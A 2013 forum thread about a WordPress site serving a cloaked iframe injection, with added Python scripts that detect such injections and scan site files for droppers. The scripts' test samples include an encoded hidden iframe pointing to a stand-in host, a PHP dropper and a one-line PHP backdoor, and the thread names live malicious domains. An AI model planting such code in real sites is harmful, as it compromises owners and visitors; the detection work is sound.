Someone reported a Virus when visiting my site
Posted: Wed Mar 06, 2013 4:37 pm
by hac2500
My clients site is
http://homelessactioncenter.org/
A user to the site reported a js.cryptic.afa trojan virus that "started an automatic download" when they visited the site. I looked over all of the files on the server and synchronised them with my local copies to see if any had been changed or added and I did not see any. I updated WordPress and removed a few orphaned files from the Media Library and asked the user to visit the site again and see if they got the virus warning. They did not.
I ran the site through
http://www.avgthreatlabs.com/sitereport ... avg.com.au and they found 0 threats.
All of the passwords for the site are very strong so I doubt they were hacked. What should I do next?
Re: Someone reported a Virus when visiting my site
Posted: Wed Mar 06, 2013 11:38 pm
by toast0
Something is inserting iframes into your site. I too got the warning when I visited the site; view source showed a javascript iframe insertion, but not when reloading or from a fresh browser. So I hit the page 100 times with wget (from a different IP, with a fake Firefox user agent). The first request also got a javascript iframe insertion, but the other 99 times were clean.
Fetching the iframe url doesn't work unless a user agent and referer header are sent; when it is fetched there's a java applet load as well as some severely obfuscated javascript. After I downloaded it once, the iframe url is giving me 500s again; these guys are sneaky (or their servers are very unreliable).
This looks similar to this
https://www.securelist.com/en/blog/2081 ... Injections, but there have also been some WordPress vulnerabilities lately too. You probably should contact
[email protected]; this is Sonic hosting, right?
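The behaviour toast0 describes (the injection appears only on the first request from a given IP, and only as a JavaScript-assembled iframe rather than a literal tag) is exactly what lets a single scanner pass come back clean. The script below is an added example, not code from the thread: it decodes document.write(unescape(...)) and String.fromCharCode(...) payloads so the assembled iframe becomes visible, flags iframes sized or styled out of view, and compares repeated fetches of one URL so a single poisoned response stands out against the clean majority. The two sample responses, the payload host payload.example.invalid and the User-Agent string are constructed for the example; fetch_repeatedly() is the live equivalent of the wget loop and is not exercised by the sample run.

```python
"""Spot a cloaked (serve-once-per-IP) iframe injection by comparing repeated fetches of one page."""
import re
import urllib.request
from collections import Counter
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.IGNORECASE | re.DOTALL)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
DIM_RE = re.compile(r"""(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)


def decode_js_payloads(page: str) -> str:
    """Append the decoded text of unescape('...') and String.fromCharCode(...) arguments,
    so an iframe assembled in JavaScript and document.write()n is visible to the regexes."""
    extra = [unquote(m.group(2)) for m in UNESCAPE_RE.finditer(page)]
    for m in FROMCHARCODE_RE.finditer(page):
        extra.append("".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()))
    return page + "\n" + "\n".join(extra)


def is_hidden(tag: str) -> bool:
    """True for iframes sized 1x1 or smaller, or styled out of view."""
    dims = [int(v) for _, v in DIM_RE.findall(tag)]
    if dims and max(dims) <= 1:
        return True
    compact = re.sub(r"\s+", "", tag.lower())
    return any(s in compact for s in ("display:none", "visibility:hidden", "left:-", "top:-"))


def iframe_sources(page: str) -> list[dict]:
    """Every iframe in the page, literal or JavaScript-assembled, with its src and hidden flag."""
    found = []
    for tag in IFRAME_RE.findall(decode_js_payloads(page)):
        src = SRC_RE.search(tag)
        found.append({"src": src.group(1) if src else "", "hidden": is_hidden(tag)})
    return found


def cloaked_injections(responses: list[str]) -> dict[int, list[str]]:
    """Given the HTML of N fetches of the same URL, return {fetch_index: [iframe srcs]} for
    fetches carrying iframe sources that the majority of fetches do not have. A once-per-IP
    injection like the one in the thread shows up as a single odd fetch among clean ones."""
    per_fetch = [{f["src"] for f in iframe_sources(r)} for r in responses]
    counts = Counter(src for srcs in per_fetch for src in srcs)
    baseline = {src for src, n in counts.items() if n > len(responses) / 2}
    return {i: sorted(srcs - baseline) for i, srcs in enumerate(per_fetch) if srcs - baseline}


def fetch_repeatedly(url: str, n: int = 100, referer: str = "https://www.google.com/") -> list[str]:
    """Live helper, not used by the sample run: fetch `url` n times with a browser-like
    User-Agent (constructed string) and a Referer, mimicking the wget loop from the thread.
    Run it from a host whose IP has not visited the site yet; the first hit is the one that matters."""
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0",
               "Referer": referer}
    pages = []
    for _ in range(n):
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=15) as resp:
            pages.append(resp.read().decode("utf-8", "replace"))
    return pages


# Constructed sample responses (not captures from the thread): a clean page with a legitimate
# embed, and the same page with a document.write()n hidden iframe to a made-up payload host.
CLEAN_PAGE = (
    "<html><head><title>Homeless Action Center</title></head><body>"
    "<div id='content'><p>Welcome.</p></div>"
    "<iframe src='https://www.youtube.com/embed/abc' width='480' height='360'></iframe>"
    "</body></html>"
)
INJECTED_TAIL = (
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fpayload.example.invalid"
    "%2Fin.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E"
    "%3C%2Fiframe%3E'));</script>"
)
POISONED_PAGE = CLEAN_PAGE.replace("</body>", INJECTED_TAIL + "</body>")


def sample_run(n: int = 100) -> dict[int, list[str]]:
    """Simulate the 100 hits from the thread: the first response is poisoned, the other n-1 are clean."""
    return cloaked_injections([POISONED_PAGE] + [CLEAN_PAGE] * (n - 1))


if __name__ == "__main__":
    for idx, srcs in sample_run().items():
        print(f"fetch #{idx}: injected iframe(s) -> {srcs}")
```

Against a live site, feed the output of fetch_repeatedly() to cloaked_injections(); a result like {0: [...]} is the once-per-IP pattern, while an empty result from an IP that has already visited the site proves nothing, which is why the first fetch has to come from a fresh address.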
Re: Someone reported a Virus when visiting my site
Posted: Wed Mar 06, 2013 11:47 pm
by toast0
I captured the altered html and the iframe html if you want to take a look; the applet I got was 0 bytes long, I'm not sure if that's the intent and the long ugly javascript does the dirty work or what.
http://ruka.org/~toast/iframes.zip (zipfile password is "dangerous", because the files are dangerous... I did save them as .txt though)
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 3:04 am
by gack
I also attempted to issue a wget but the iframe's domain changed from yours:
instead of lovehiilda85.us.to it now goes to bllackthere89.us.to. lovehiilda85.us.to is no longer valid.
Name: bllackthere89.us.to
Address: 173.236.50.234
http://whois.arin.net/rest/net/NET-173-236-0-0-1/pft
Code:
Network
NetRange 173.236.0.0 - 173.236.127.255
CIDR 173.236.0.0/17
Name SINGLEHOP
Handle NET-173-236-0-0-1
Parent NET173 (NET-173-0-0-0-0)
Net Type Direct Allocation
Origin AS AS32475
Organization SingleHop, Inc. (SINGL-8)
Registration Date 2010-03-23
Last Updated 2012-03-02
Comments
RESTful Link http://whois.arin.net/rest/net/NET-173-236-0-0-1
Function Point of Contact
Tech NETWO1546-ARIN (NETWO1546-ARIN)
NOC NETWO1546-ARIN (NETWO1546-ARIN)
Abuse ABUSE2492-ARIN (ABUSE2492-ARIN)
See Also Related organization's POC records.
See Also Related delegations.
Organization
Name SingleHop, Inc.
Handle SINGL-8
Street 215 W. Ohio St.
5th Floor
City Chicago
State/Province IL
Postal Code 60654
Country US
Registration Date 2007-03-07
Last Updated 2012-11-19
Comments http://www.singlehop.com/
RESTful Link http://whois.arin.net/rest/org/SINGL-8
Referral Server rwhois://rwhois.singlehop.net:4321
Function Point of Contact
NOC NETWO1546-ARIN (NETWO1546-ARIN)
Admin ZDB1-ARIN (ZDB1-ARIN)
Abuse ABUSE2492-ARIN (ABUSE2492-ARIN)
Tech NETWO1546-ARIN (NETWO1546-ARIN)
Point of Contact
Name Network Operations
Handle NETWO1546-ARIN
Company SingleHop LLC
Street 215 W Ohio St Flr 5
City Chicago
State/Province IL
Postal Code 60654
Country US
Registration Date 2007-02-15
Last Updated 2012-11-19
Comments
Phone +1-866-817-2811 (Office)
Email [email protected]
RESTful Link http://whois.arin.net/rest/poc/NETWO1546-ARIN
Point of Contact
Note ARIN has attempted to validate the data for this POC, but has received no response from the POC since 2010-12-03
Name Boca , Zachary D
Handle ZDB1-ARIN
Company midPhase, Inc
Street 223 West Jackson Suite 600
City Chicago
State/Province IL
Postal Code 60606
Country US
Registration Date 2006-10-10
Last Updated 2009-12-03
Comments
Phone +1-312-386-1640 (Office)
Email [email protected]
RESTful Link http://whois.arin.net/rest/poc/ZDB1-ARIN
Point of Contact
Name Abuse Department
Handle ABUSE2492-ARIN
Company SingleHop, Inc.
Street 621 W. Randolph
3rd Floor
City Chicago
State/Province IL
Postal Code 60661
Country US
Registration Date 2009-12-03
Last Updated 2011-12-06
Comments
Phone +1-866-817-2811 (Office)
Email [email protected]
RESTful Link http://whois.arin.net/rest/poc/ABUSE2492-ARIN
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 10:18 am
by hac2500
I actually contacted Sonic support first and they referred me here. How would I go about removing this?
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 11:03 am
by hac2500
Thanks a lot for the help BTW!!
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 12:49 pm
by williamt
Hi hac2500,
I have removed the infected code from your site. I'm not 100% sure on how it got there in the first place but I suspect the current theme you are using is vulnerable to attacks.
I would recommend switching or upgrading your theme to one that isn't vulnerable.
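The thread does not show how the injected code was located, so here is an added example (not williamt's or the forum's code) of the two checks a practitioner would run on the server itself: a signature scan of the WordPress tree for the constructs droppers and backdoors use, and a content-hash diff of the live web root against a known-clean copy, which catches what a by-eye sync like the original poster's can miss, such as a PHP file dropped into wp-content/uploads. The sample theme files, the dropper, the backdoor and the host payload.example.invalid are all constructed for the example.

```python
"""Find server-side injected code in a WordPress tree and diff the live tree against a clean copy."""
import base64
import hashlib
import re
import tempfile
from pathlib import Path

# Constructs that legitimate core, theme and plugin code almost never contain but injected
# droppers and backdoors almost always do. Each hit is a lead to read by hand, not proof.
SIGNATURES = [
    ("eval of decoded blob",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
    ("document.write of encoded markup", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("long base64 literal", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
    ("hex-escaped string", re.compile(r"(\\x[0-9a-f]{2}){12,}", re.I)),
    ("User-Agent conditional rewrite", re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}", re.I)),
]
SCAN_SUFFIXES = {".php", ".js", ".html"}


def find_suspicious_code(root: str) -> list[tuple[str, str]]:
    """Return sorted (path relative to root, signature label) pairs for files matching a signature."""
    root_path = Path(root)
    hits = []
    for path in root_path.rglob("*"):
        if not path.is_file():
            continue
        if path.suffix.lower() not in SCAN_SUFFIXES and path.name != ".htaccess":
            continue
        text = path.read_text(errors="replace")
        for label, rx in SIGNATURES:
            if rx.search(text):
                hits.append((path.relative_to(root_path).as_posix(), label))
    return sorted(hits)


def _hashes(root: str) -> dict[str, str]:
    """SHA-256 of every regular file under root, keyed by POSIX-style relative path."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in Path(root).rglob("*") if p.is_file()}


def diff_trees(reference: str, live: str) -> dict[str, list[str]]:
    """Compare a known-clean copy with the live web root by content hash: files the server
    has that the copy does not, files whose bytes differ, and files the server lost."""
    ref, cur = _hashes(reference), _hashes(live)
    return {
        "added": sorted(set(cur) - set(ref)),
        "modified": sorted(k for k in ref.keys() & cur.keys() if ref[k] != cur[k]),
        "missing": sorted(set(ref) - set(cur)),
    }


# Constructed sample (not files from the thread): a two-file twentyten theme, a tampered
# footer.php that echoes a hidden iframe once per visitor, and a dropped backdoor in uploads/.
CLEAN_FOOTER = "<?php wp_footer(); ?>\n</body>\n</html>\n"
DROPPER_PHP = (b"if(!isset($_COOKIE['seen'])){setcookie('seen','1');"
               b"echo '<iframe src=\"//payload.example.invalid/in.php\" width=1 height=1></iframe>';}")
INJECTED_FOOTER = CLEAN_FOOTER.replace(
    "</body>",
    "<?php eval(base64_decode('" + base64.b64encode(DROPPER_PHP).decode() + "')); ?>\n</body>")
BACKDOOR = "<?php $f=$_REQUEST['f']; @eval(base64_decode($f)); ?>\n"


def build_sample_trees() -> tuple[str, str]:
    """Write a clean reference copy and a tampered live copy into two temp dirs; return both."""
    ref = tempfile.mkdtemp(prefix="wp-ref-")
    live = tempfile.mkdtemp(prefix="wp-live-")
    for base in (ref, live):
        theme = Path(base, "wp-content", "themes", "twentyten")
        theme.mkdir(parents=True)
        (theme / "functions.php").write_text("<?php add_theme_support('post-thumbnails');\n")
        (theme / "footer.php").write_text(CLEAN_FOOTER)
    Path(live, "wp-content", "themes", "twentyten", "footer.php").write_text(INJECTED_FOOTER)
    uploads = Path(live, "wp-content", "uploads")
    uploads.mkdir()
    (uploads / "cache.php").write_text(BACKDOOR)
    return ref, live


def sample_report() -> dict:
    """Build the sample trees and return the scan of both copies plus the diff between them."""
    reference, webroot = build_sample_trees()
    return {"hits": find_suspicious_code(webroot),
            "clean_hits": find_suspicious_code(reference),
            "diff": diff_trees(reference, webroot)}


if __name__ == "__main__":
    report = sample_report()
    for path, label in report["hits"]:
        print(f"{path}: {label}")
    print(report["diff"])
```

On a real install, point find_suspicious_code() at the web root and diff_trees() at a fresh download of the same WordPress core and theme versions; any .php file under wp-content/uploads is suspect whether or not a signature fires, and `find /path/to/webroot -name '*.php' -mtime -7` is a cheap complement that lists what changed recently.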
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 1:27 pm
by hac2500
Thanks William! It is a customized twentyten theme which was the default theme back in 2010 when the site was built. Just the CSS has been altered. Do you think I need to use a different theme?
Re: Someone reported a Virus when visiting my site
Posted: Thu Mar 07, 2013 1:31 pm
by williamt
I would check if there is an update to it first. If not, I would probably switch themes.
Re: Someone reported a Virus when visiting my site
Posted: Tue Mar 12, 2013 10:33 pm
by virtualmike
From Google's Webmaster Central Blog...
New first stop for hacked site recovery
We certainly hope you never have to use our new Help for hacked sites informational series. It's a dozen articles and over an hour of videos dedicated to helping webmasters in the unfortunate event that their site is compromised.